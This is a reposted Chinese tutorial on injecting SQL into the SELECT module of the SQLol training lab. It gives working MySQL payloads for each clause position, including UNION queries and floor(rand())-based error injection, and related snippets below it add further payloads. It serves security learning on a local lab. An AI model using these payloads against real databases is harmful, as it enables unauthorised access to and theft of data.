SQL注入测试平台 SQLol -2.SELECT注入测试

最新推荐文章于 2025-09-01 13:38:58 发布
转载 最新推荐文章于 2025-09-01 13:38:58 发布 · 70 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/xiaozi/p/5517949.html

    前面,我们已经安装好了SQLol,打开http://localhost/sql/,首先跳转到http://localhost/sql/select.php,我们先从select模块进行测试。

 

一条完成Select语句,大致可以这样表示:

SELECT 【username】 FROM 【users】 WHERE username = 【'1'】 GROUP BY 【username】 ORDER BY 【username ASC】 [having 【1=1】 ][limit 【0,1】 ]

接收的参数可能拼接到上述语句中【】的任一个位置。

注射位置不同,构造sql注入语句的方法也有所不同,但大致可以划分为三种。

1、联合查询(union select)

2、报错注入

3、盲注(布尔类型、时间延迟类型)

有的注入点可以同时使用多种方法注入,这里只演示一种。

下面演示注入到不同位置的方法。

 

一、WHERE 子句里的字符串

Tips:字符型注入;

在注射字符串中输入:admin,显示语句,选择注射位置为,WHERE子句里的字符串,返回的信息为:

SELECT username FROM users WHERE username = 'admin' GROUP BY username ORDER BY username ASC

可以知道我们输入的admin,被拼接到where子句里面,然后我们开始构造POC:

admin' union select user()#

如下图,我们取得数据库用户名(root@localhost),可以将user()替换为其他查询语句查询其他数据。

 

 

二、WHERE 子句里的数字

Tips:与上面的WHERE 子句里的字符串类似,所不同的,这是数字型注入;

在注射字符串中输入:1,显示语句,选择注射位置为,WHERE子句里的数据,返回的信息为: 

SELECT username FROM users WHERE isadmin = 1  GROUP BY username ORDER BY username ASC

构造POC:

SELECT username FROM users WHERE isadmin = 1 union select user()# GROUP BY username ORDER BY username ASC

如下图,我们取得数据库用户名。

 

三、整个语句

Tips: 直接可以执行任何sql语句

在注射字符串中输入:select * from users,users为数据库用户表,显示语句,选择注射位置为,整条语句,返回的信息为:

select * from users

可以在这里输入任何的sql语句执行。

 

四、Column 名称

Tips: 注入位置在username

 SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC

利用方式:

1、输入字段查询users表,或直接用*代替,查询users表中所有的数据

2、注释掉后面的语句,与select直接拼接,例如:注射字符串位置输入version(),拼接成

SELECT version()# FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC

替换version(),输入其他数据库查询语句,可查询其他数据

 

 

五、Table 名称

 Tips:注射位置在表users

SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC

利用方式:

1、输入正确的表名,union select查询

 

 

六、ORDER BY 子句

Tips:注射位置在order by  

当使用union操作时,排序语句必须放在最后面才正确,就是说只能在union的最后一个子查询中使用order by,因此这里不能用union slect。

利用方式:

报错注入

1 and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

得到数据库sqlol,可以使用其他语句继续报错注入。 

参考资料:http://www.myhack58.com/Article/html/3/7/2013/38704.htm

 

七、GROUP BY 子句

Tips:注射位置在group by

GROUP BY 语句用于结合合计函数,根据一个或多个列对结果集进行分组。

利用方式:  

1、与order by 一样,直接报错注入

2、在MSSQL中,可以利用group by  , having 进行爆当前列

八、HAVING 子句

Tips:having位置

利用方式:

报错注入

 

最后

欢迎关注个人微信公众号:Bypass--,每周一篇原创高质量的干货。 

 

转载于:https://www.cnblogs.com/xiaozi/p/5517949.html

an0708
关注
渗透测试SQL注入实战篇--MCIR的sqlol模块07-09
WEL测试
11-20 547
SQL注入实例-SQLol(7) 页面:/sqlol/challenges/challenge7.php 输入语句检测是否有sql注入:' and 1='2 1、查找数据库用户、数据库版本: #故意使extractvalue报错! #以16进制0x7e即~符号作为标志, 头~和尾~ 之间的字符即所需数据! ' and (extractvalue(1,concat(0x7e,(select concat_ws(char(32,58,32),user(),database(),version())),0x7
渗透测试SQL注入实战篇--MCIR的sqlol模块challenges0~5
WEL测试
11-18 829
SQL注入实例-SQLol(0) 页面:/sqlol/challenges/challenge0.php 验证是否存在sql注入: 调整输入信息:' or '1'='1 SQL注入实例-SQLol(1) 页面:/sqlol/challenges/challenge1.php 1、查找数据库: ' and 1=2 union select concat_ws(char(32,58,32),user(),database(),version())# 解释语句: concat_ws(char(3
SQL注入测试平台 SQLol-2.SELECT注入测试
缘木之鱼
04-18 815
SQLol - Challenge 0 - Hello, world! 完整Select语句: SELECT 【username】 FROM 【users】 WHERE username = 【‘1’】GROUP BY 【username】 ORDER BY 【username】 ASC [having 【1=1】][limit 【0,1】] 接收的参数可能拼接到上述语句中【】的任一个位置。 ...
SQL注入测试平台 SQLol -6.CHALLENGES挑战
05-28 88
  SQLol上面的挑战共有14关,接下来我们一关一关来突破。 Challenge 0 目的是让查询返回所有的用户名,而不是只有一个。 SELECT username FROM users WHERE username = 【'1'】GROUP BY username ORDER BY username ASC 注入点在【1】处 构造POC: 1' or 1=1# 或...
渗透测试SQL注入实战篇--MCIR的sqlol模块challenges10-11
WEL测试
11-21 574
SQL注入实例-SQLol(10) 页面:/sqlol/challenges/challenge10.php 获取运行sql: 1、获取数据库: concat_ws(":",user(),database(),version()) # 2、获取表: concat_ws("~",TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='sqlol' # 3、获取表users的所有列: concat_ws("~",COLUMN_N
php测试注入源码,SQL注入测试平台的搭建
weixin_42368226的博客
03-20 234
SQLol是一个可配置得SQL注入测试平台,它包含了一系列的挑战任务,让你在挑战中测试和学习SQL注入语句,SQLol还是比较有创意的项目。一 SQLol的下载下载地址:http://github.com/SpiderLabs/MCIR二 安装步骤下载下来的时候一个.zip文件在php网站的WWW目录,新建立一个文件夹sql,解压在sql目录下面,打开/includes/database.c...
SQL注入原理---Web渗透学习
Packet_Lee的博客
04-07 1824
SQL注入的危害: 1.拖库导致数据库泄露; 2.危害web等应用的安全; 3.失去操作系统的控制权; 4.用户信息被非法买卖; 5.危害企业及国家的安全。 SQL注入的主要方式: 1.基于错误的注入2.基于布尔的注入; 3.基于UNION的注入; 4.基于时间的注入SQL关注的主要数据库: information_schema库:其实MYSQL数据库的信息数据库,其保存着MYSQL服务器...
渗透测试:堆叠注入--MCIR的challenge6.php实例
WEL测试
11-18 625
说明 MCIR提供/sqlol/challenges/challenge6.php实例是不完毕的,需要调整mcir/includes/database.inc.php使用的adodb的Execute进行sql执行,不支持堆叠sql执行方法mysqli_multi_query。因此本实例执行是失败的,关于堆叠注入失败验证过程如下: 操作步骤 页面:/sqlol/challenges/challenge6.php 输入' and '1=2' 获取执行的sql如下: '; CREATE TABLE sqlol
8、攻击 Web、移动和物联网应用程序:SQL 注入实战
rose2的博客
09-01 91
本文详细介绍了SQL注入攻击的多种实战技巧,涵盖从基础的重言式攻击到复杂的盲注技术。通过挑战不同难度的应用程序(如SQLol和Peruggia),展示了如何利用SQL注入提取敏感信息、绕过过滤机制以及在无直接输出的情况下进行信息推理。同时,文章提供了多种防范SQL注入的措施,包括输入验证、预编译语句和错误处理,帮助开发者提高应用程序的安全性。
matlab调用python烧录PX4程序
12-31
matlab调用python烧录PX4程序
数据驱动的两阶段分布鲁棒(1-范数和∞-范数约束)的电热综合能源系统研究(Matlab代码实现)
12-31
数据驱动的两阶段分布鲁棒(1-范数和∞-范数约束)的电热综合能源系统研究(Matlab代码实现)内容概要:本文围绕“数据驱动的两阶段分布鲁棒(1-范数和∞-范数约束)的电热综合能源系统研究”展开,提出了一种结合数据驱动与分布鲁棒优化方法的建模框架,用于解决电热综合能源系统在不确定性环境下的优化调度问题。研究采用两阶段优化结构,第一阶段进行预决策,第二阶段根据实际场景进行调整,通过引入1-范数和∞-范数约束来构建不确定集,有效刻画风电、负荷等不确定性变量的波动特性,提升模型的鲁棒性和实用性。文中提供了完整的Matlab代码实现,便于读者复现和验证算法性能,并结合具体案例分析了不同约束条件下系统运行的经济性与可靠性。; 适合人群:具备一定电力系统、优化理论和Matlab编程基础的研究生、科研人员及工程技术人员,尤其适合从事综合能源系统、鲁棒优化、不确定性建模等相关领域研究的专业人士。; 使用场景及目标:①掌握数据驱动的分布鲁棒优化方法在综合能源系统中的应用;②理解1-范数和∞-范数在构建不确定集中的作用与差异;③学习两阶段鲁棒优化模型的建模思路与Matlab实现技巧,用于科研复现、论文写作或工程项目建模。; 阅读建议:建议读者结合提供的Matlab代码逐段理解算法实现细节,重点关注不确定集构建、两阶段模型结构设计及求解器调用方式,同时可尝试更换数据或调整约束参数以加深对模型鲁棒性的理解。
基于 Github Actions 的 Hamibot 脚本定时执行方案,解决免费额度利用问题!.zip
12-31
基于 Github Actions 的 Hamibot 脚本定时执行方案,解决免费额度利用问题!.zip
(12页PPT)用计算器计算练习课神奇的数字.pptx
12-31
(12页PPT)用计算器计算练习课神奇的数字.pptx
协同路径多Dubins路径段协同路径规研究(Matlab代码实现)
12-31
【协同路径】多Dubins路径段协同路径规研究(Matlab代码实现)内容概要:本文围绕“多Dubins路径段协同路径规划”展开研究,利用Matlab代码实现多智能体(如无人机、机器人)在复杂环境下的协同路径规划。核心内容包括Dubins路径模型的构建与优化,多路径段的协同策略设计,以及路径平滑性、避障能力与任务效率的综合平衡。文中通过仿真验证了算法在动态环境中的有效性与鲁棒性,适用于需要高精度航向控制的移动平台路径规划。; 适合人群:具备Matlab编程基础,从事自动化、机器人、无人机路径规划等相关领域研究的研究生、科研人员及工程技术人员。; 使用场景及目标:①解决多智能体系统在受限运动条件下(如最小转弯半径限制)的协同路径规划问题;②提升复杂环境中路径的安全性、连续性与任务协同效率;③为相关科研项目或工程应用提供可复现的算法原型与仿真支持。; 阅读建议:建议结合Matlab代码逐模块分析,重点关注Dubins路径生成、协同约束建模与优化求解过程,可通过调整参数和场景进行仿真测试,加深对协同机制与路径性能关系的理解。
mysql-workbench-community-8.0.25-macos.dmg
最新发布
12-31
下载前可以先看下教程 https://pan.quark.cn/s/a4b39357ea24 MySQL的图形化操作版本,在macOS Big Sur系统中具备兼容性。 提供最新版本的安装软件包。
(16页PPT)第4课时两步计算的解决问题.pptx
12-31
(16页PPT)第4课时两步计算的解决问题.pptx
【更新至2024年】2007-2024年上市公司cnrds ESG评分数据
12-31
【更新至2024年】2007-2024年上市公司cnrds ESG评分数据 1、时间:2007-2024年 2、来源:cnrds 3、指标:股票代码、公司简称、会计年度、ESG得分、ESG排名、E得分、E排名、S得分、S排名、G得分、G排名 4、范围:A股上司公司 5、数据说明: [E得分]-环境主题得分 [E排名]-环境主题排名 [S得分]-社会主题得分 [S排名]-社会主题排名 [G得分]-治理主题得分 [G排名]-治理主题排名
毕业设计基于Django+vue框架的胶济铁路博物馆管理系统的设计与实现源码+数据库文档+演示视频.zip
12-31
毕业设计基于Django+vue框架的胶济铁路博物馆管理系统的设计与实现源码+数据库文档+演示视频.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值